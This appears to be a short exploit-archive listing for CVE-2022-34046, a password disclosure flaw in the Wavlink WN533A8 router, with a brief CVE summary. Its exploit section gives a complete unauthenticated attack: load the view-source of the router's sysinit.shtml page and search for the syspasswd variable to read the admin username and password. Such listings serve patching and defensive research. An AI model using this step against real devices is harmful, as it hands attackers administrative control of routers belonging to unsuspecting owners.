Headline
Wavlink WN533A8 Password Disclosure
Wavlink WN533A8 suffers from a password disclosure vulnerability.
Change Mirror Download
# Exploit Title: Wavlink WN533A8 - Password Disclosure# Date: 2022-06-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34046# Tested on: Windows# Exploitview-source:http://IP_ADDRESS/sysinit.shtmlsearch for var syspasswd="you will find the username and the passwordRelated news
CVE-2022-34046
An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].